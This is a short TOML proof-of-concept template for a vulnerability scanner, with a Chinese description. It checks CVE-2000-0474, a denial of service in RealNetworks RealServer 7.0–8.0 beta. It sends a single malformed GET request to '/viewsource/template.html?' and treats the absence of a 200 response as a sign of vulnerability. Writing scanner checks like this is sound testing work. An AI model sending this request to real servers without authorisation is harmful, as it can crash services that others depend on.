[info]
author = "ave"
description = "RealNetworks RealServer 7.0/7.0.1/8.0 Beta viewsource 目录畸形请求导致拒绝服务漏洞验证"
id = "POC-AVE-2000-0397"
name = "CVE-2000-0474 PoC"
severity = "high"
tags = ["ave-2000-0397"]
vuln_id = [
    "CVE-2000-0474",
    "AVE-2000-0397",
]

[poc]
logic = "all"

[[poc.requests]]
method = "GET"
path = "/viewsource/template.html?"
protocol = "http"

[poc.requests.body]
content = ""
type = "raw"

[poc.requests.headers]
User-Agent = "AVE/1.0"

[[poc.requests.matchers]]
expect = false
status = [200]
type = "status"
